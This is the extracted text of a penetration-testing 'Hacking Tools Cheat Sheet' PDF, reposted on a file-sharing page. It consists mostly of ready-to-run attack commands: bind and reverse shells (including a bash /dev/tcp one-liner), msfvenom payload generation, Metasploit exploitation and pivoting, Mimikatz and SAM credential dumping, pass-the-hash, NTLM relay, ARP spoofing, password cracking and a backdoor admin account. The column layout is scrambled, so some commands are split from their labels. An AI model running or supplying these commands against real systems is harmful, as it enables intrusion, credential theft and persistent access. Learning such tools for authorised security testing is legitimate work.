hacking-tools-cheat-sheet.pdf

(140 KB) Pobierz
Hacking Tools Cheat Sheet
Basic Linux Networking Tools
Show IP configuration:
# ip a lw
Change IP/MAC address:
# ip link set dev eth0 down
# macchanger -m 23:05:13:37:42:21 eth0
# ip link set dev eth0 up
Static IP address configuration:
# ip addr add 10.5.23.42/24 dev eth0
DNS lookup:
# dig compass-security.com
Reverse DNS lookup:
# dig -x 10.5.23.42
cert.pem --ssl-key key.pem
Connect to TLS service:
# ncat --ssl 10.5.23.42 1337
Connect to TLS service using
openssl:
# openssl s_client -connect
10.5.23.42:1337
Show certificate details:
# openssl s_client -connect
10.5.23.42:1337 | openssl x509 -text
Test TLS server certificate and ciphers:
# sslyze --regular 10.5.23.42:443
TCP to TLS proxy:
# socat TCP-LISTEN:2305,fork,reuseaddr
ssl:example.com:443
Online TLS tests:
• ssllabs.com, hardenize.com
Information Gathering
Find owner/contact of domain or IP address:
# whois compass-security.com
Get nameservers and test for DNS zone
transfer:
# dig example.com ns
# dig example.com axfr @n1.example.com
Get hostnames from CT logs:
Search for
%.compass-security.com on https://crt.sh.
Or using an nmap script:
# nmap -sn -Pn compass-security.com
--script hostmap-crtsh
Combine various sources for subdomain
enum:
# amass enum -src -brute -min-forrecursive
2 -d compass-security.com
HTTP Tools
TCP Tools
Listen on TCP port:
# ncat -l -p 1337
Connect to TCP port:
# ncat 10.5.23.42 1337
Start Python webserver on port 2305:
# python3 -m http.server 2305
Perform HTTP Request:
# curl http://10.5.23.42:2305/?foo=bar
Useful curl options:
-k:
Accept untrusted certificates
• -d “foo=bar”: HTTP POST data
• -H: “Foo: Bar”: HTTP header
• -I: Perform HEAD request
• -L: Follow redirects
• -o foobar.html:
Write output file
• --proxy http://127.0.0.1:8080: Set proxy
Scan for common files/applications/configs:
# nikto -host https://example.net
Enumerate common directory-/filenames:
# gobuster dir -k -u
https://example.net -w
/usr/share/wordlists/dirb/common.txt
# tcpdump [options] [filters]
Useful tcpdump options:
• -i interface: Interface or any for all
• -n: Disable name and port resolution
• -A: Print in ASCII
• -XX: Print in hex and ASCII
-w file: Write output PCAP file
-r file: Read PCAP file
Useful tcpdump
filters:
• not arp: No ARP packets
port ftp or port 23:
Only port 21 or 23
• host 10.5.23.31: Only from/to host
• net 10.5.23.0/24: Only from/to hosts in
network
Advanced sniffing using
tshark or Wireshark.
Sniffing over SSH on a remote host:
# ssh 10.5.23.42 tcpdump -w- port not
ssh | wireshark -k -i -
Search in network traffic:
# ngrep -i password
Show HTTP GET requests:
# urlsnarf
Show transmitted images:
# driftnet
10.5.23.0/24
Useful nmap options:
• -n: Disable name and port resolution
• -PR: ARP host discovery
• -Pn: Disable host discovery
-sn: Disable port scan (host discovery
only)
• -sS/-sT/-sU: SYN/TCP connect/UDP scan
• --top-ports 50: Scan 50 top ports
-iL file: Host input file
-oA file: Write output files (3 types)
• -sC: Script scan (default scripts)
--script <file/category>: Specific scripts
• -sV: Version detection
• -6: IPv6 scan
The target can be specified using CIDR nota-
tion
(10.5.23.0/24)
or range definitions (10.13-
37.5.1-23).
Fast scan using masscan:
# masscan -p80,8000-8100 --rate 20000
10.0.0.0/8
Public internet scan databases:
• shodan.io, censys.io
Sniffing
TLS Tools
Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048
-keyout key.pem -out cert.pem -nodes
-subj “/CN=example.org/”
Start TLS Server:
# ncat --ssl -l -p 1337 --ssl-cert
ARP spoofing:
# arpspoof -t 10.5.23.42 10.5.23.1
Or a graphical tool:
# ettercap -G
Show ARP cache:
# ip neigh
Delete ARP cache:
# ip neigh flush all
Sniff traffic:
ARP Scan:
Start bind shell (on victim):
# nmap -n -sn -PR 10.5.23.0/24
# ncat -l -p 2305 -e “/bin/bash -i”
Reverse DNS lookup of IP range:
Connect to bind shell (on attacker):
# nmap -sL 10.5.23.0/24
# ncat 10.5.23.42 2305
Nmap host discovery (ARP, ICMP, SYN 443/tcp, Listen for reverse shell (on attacker):
ACK 80/tcp):
# ncat -l -p 23
# nmap -sn -n 10.5.23.0/24
Start reverse shell (on victim):
TCP scan (SYN scan = half-open scan):
# ncat -e “/bin/bash -i” 10.5.23.5 23
# nmap -Pn -n -sS -p
Start reverse shell with bash only (on vic-
22,25,80,443,8080 10.5.23.0/24
tim):
List Nmap scripts:
# bash -i &>/dev/tcp/10.5.23.5/42 0>&1
# ls /usr/share/nmap/scripts
Upgrade to pseudo terminal:
Scan for EternalBlue vulnerable hosts:
# python -c ‘import pty;
# nmap -n -Pn -p 443 --script smbvuln-
pty.spawn(“/bin/bash”)’
ms17-010 10.5.23.0/24
Scan for vulnerabilities (script category filter):
# nmap -n -Pn --script “vuln and safe”
10.5.23.0/24
Performance Tuning (1 SYN packet ≈ 60 bytes
→ 20’000 packets/s ≈ 10 Mbps):
# nmap -n -Pn --min-rate 20000
Network Scanning
Shells
Vulnerability DBs and Exploits
Upgrade to Meterpreter (or press ^Z(Ctrl-Z)):
Exploit search (local copy of the Exploit-DB):
background
Background session 1? [y/N] y
# searchsploit apache
Show exploit file path and copy it into clip-
> sessions # list sessions
> sessions -u 1 # Upgrade
board:
> sessions 2 # interact with session 2
# searchsploit -p 40142
Online vulnerability and exploit databases:
meterpreter > sysinfo # use it
Upload / download files:
• cvedetails.com, exploit-db.com,
meterpreter > upload pwn.exe
packetstormsecurity.com
meterpreter > download c:\keepass.kdb
Execute a file:
Cracking
meterpreter > execute -i -f /your/bin
Try SSH passwords from a wordlist:
Port forwarding to localhost:
# ncrack -p 22 --user root -P
meterpreter > portfwd add -l 2323 -p
./passwords.txt 10.5.23.0/24
3389 -r 10.5.23.23
Determine hash type:
Background Meterpreter session:
# hashid 869d[...]bd88
meterpreter > background
Show example hash types for hashcat:
Pivoting through existing Meterpreter ses-
# hashcat --example-hashes
Crack hashes (e.g. 5600 for NetNTLMv2 type):
sion:
> use post/multi/manage/autoroute
# hashcat -m 5600 -a 0 hash.txt
> set session 2 # meterpreter session
/path/to/wordlists/*
> run
Crack hashes using John the Ripper:
> route
# john hashes.txt
SOCKS via Meterpreter (requires autoroute):
> use auxiliary/server/socks4a
Metasploit Framework
> set SRVPORT 8080
Start Metasploit:
> run
# msfconsole
Configure ProxyChains:
Search exploit:
# vi /etc/proxychains.conf
> search eternalblue
[...]
Use exploit:
socks4 127.0.0.1 1080
msf > use exploit/windows/smb/ms17_…
Connect through SOCKS proxy:
Configure exploit:
# proxychains ncat 172.23.5.42 1337
msf exploit(…) > show options
msf exploit(…) > set TARGET 10.5.23.42
Linux Privilege Escalation
Run exploit:
Enumerate local information (-t for more
msf exploit(…) > exploit
tests):
Generate reverse shell (WAR):
# curl -o /tmp/linenum
# msfvenom -p
https://raw.githubusercontent.com/rebo
java/jsp_shell_reverse_tcp LHOST=<your
otuser/LinEnum/master/LinEnum.sh
ip address> LPORT=443 -f war > sh.war
# bash /tmp/linenum -r /tmp/report
Reverse shell listener:
Other hardening checks can be done using lynis
> use exploit/multi/handler
or LinPEAS.
> set payload
Use sudo/SUID/capabilities/etc. exploits from
linux/x64/shell_reverse_tcp
gtfobins.github.io.
> set LHOST 10.5.23.42 # attacker
Windows Privilege Escalation
> set LPORT 443
Copy PowerUp.ps1
from GitHub “PowerShellMa-
> exploit
fia/PowerSploit” into PowerShell to
bypass ExecutionPolicy and execute Invoke-
AllChecks. Use the abuse functions.
Add a new local admin:
C:\> net user backdoor P@ssw0rd23
C:\> net localgroup Administrators backdoor /
add
Scan for network shares:
# smbmap.py --host-file smbhosts.txt -
u Administrator -p PasswordOrHash
windows/meterpreter/reverse_tcp
msf > set LHOST 10.5.23.42 # attacker
msf > set LPORT 443
msf > set RHOST 10.5.23.21 # victim
msf > set SMBPass 01[...]03:01[...]03
msf > exploit
meterpreter > shell
C:\WINDOWS\system32>
NTLM Relay
Windows Credentials Gathering
Start Mimikatz and create log file:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
Read
lsass.exe
process dump:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in
taskmgr
or procdump.
Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords
Backup SYSTEM & SAM hive:
C:\>reg save HKLM\SYSTEM system.hiv
C:\>reg save HKLM\SAM sam.hiv
Extract hashes using Mimikatz:
# lsadump::sam /system:system.hiv
/sam:sam.hiv
Pass-the-Hash
Shell via pass-the-hash (Impacket Tools):
# ./psexec.py -hashes
:011AD41795657A8ED80AB3FF6F078D03
Active Directory
domain/username@10.5.23.42
Use SharpHound to gather information and
Over a subnet and extract SAM file:
import
# crackmapexec -u Administrator -H
into Bloodhound to analyze.
:011AD41795657A8ED80AB3FF6F078D03
Download PingCastle from pingcastle.com
10.5.23.0/24 --sam
and
Browse shares via pass-the-hash:
generate Report.
# ./smbclient.py
domain/usrname@10.5.23.42 -hashes
More Online References
:011AD41795657A8ED80AB3FF6F078D03
• GitHub “swisskyrepo/PayloadsAllTheTh-
RDP via pass-the-hash:
ings”
# xfreerdp /u:user /d:domain /pth:
• GitHub “danielmiessler/SecLists
011AD41795657A8ED80AB3FF6F078D03
• GitHub “enaqx/awesome-pentest”
/v:10.5.23.42
Meterpreter via pass-the-hash:
FindmoreStationXCheatSheetshere-
msf > set payload
https://www.stationx.net/category/ch
e a t - s h e e ts /
Vulnerable if message_signing: disabled:
# nmap -n -Pn -p 445 --script smbsecurity-
mode 10.5.23.0/24
Disable
SMB
and
HTTP
in Responder.conf
and start Responder:
# ./Responder.py -I eth0
NTLM Relay to target and extract SAM file:
# ./ntlmrelayx.py -smb2support -t
smb://10.5.23.42
NTLM Relay using socks proxy:
# ./ntlmrelayx.py -tf targets.txt
-smb2support -socks
Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080
Access files via SOCKS proxy:
# proxychains smbclient -m smb3
‘\\10.5.23.42\C$’ -W pc05 -U
Administrator%invalidPwd

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika:

Zgłoś jeśli naruszono regulamin